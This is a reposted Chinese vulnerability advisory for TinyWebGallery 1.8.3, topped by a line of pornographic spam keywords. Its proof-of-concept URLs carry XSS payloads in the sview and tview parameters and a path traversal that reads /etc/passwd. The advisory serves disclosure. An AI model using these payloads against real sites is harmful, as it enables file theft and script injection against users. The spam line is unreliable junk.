中国免费看xxx|伊人日韩欧美一区|成人网站在线看。|我操美女在线播放|美女免费视频一区|操狠狠操狠狠网站|亚洲综合日韩精品视频|一区二区三区成人在线|森田咏美AV在线|一本岛av在线亚洲一区国产一区

TinyWebGallery 1.8.3版多個(gè)安全漏洞漏洞預(yù)警 -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【m.ddsf.com.cn - 電腦資料】

   

    TinyWebGallery是一款php相冊(cè)程序,TinyWebGallery 1.8.3中包含多個(gè)安全漏洞,包括目錄遍歷和XSS,可能導(dǎo)致敏感信息泄露,

TinyWebGallery 1.8.3版多個(gè)安全漏洞漏洞預(yù)警

    [+]info:

    ~~~~~~~~~

    Script. TinyWebGallery

    Version: 1.8.3 (No fixes yet, might work on other versions too).

    Home: http://www.tinywebgallery.com

    [+]poc:

    ~~~~~~~~~

    http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"

    http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"

    http://localhost/twg183/admin/index.php?dir=

    http://localhost/twg183/admin/index.php?action=chmod&item=

    http://localhost/twg183/twg183/admin/index.php?action=chmod&item=">

    http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

    [+]Reference:

    ~~~~~~~~~

    http://www.exploit-db.com/exploits/16090

最新文章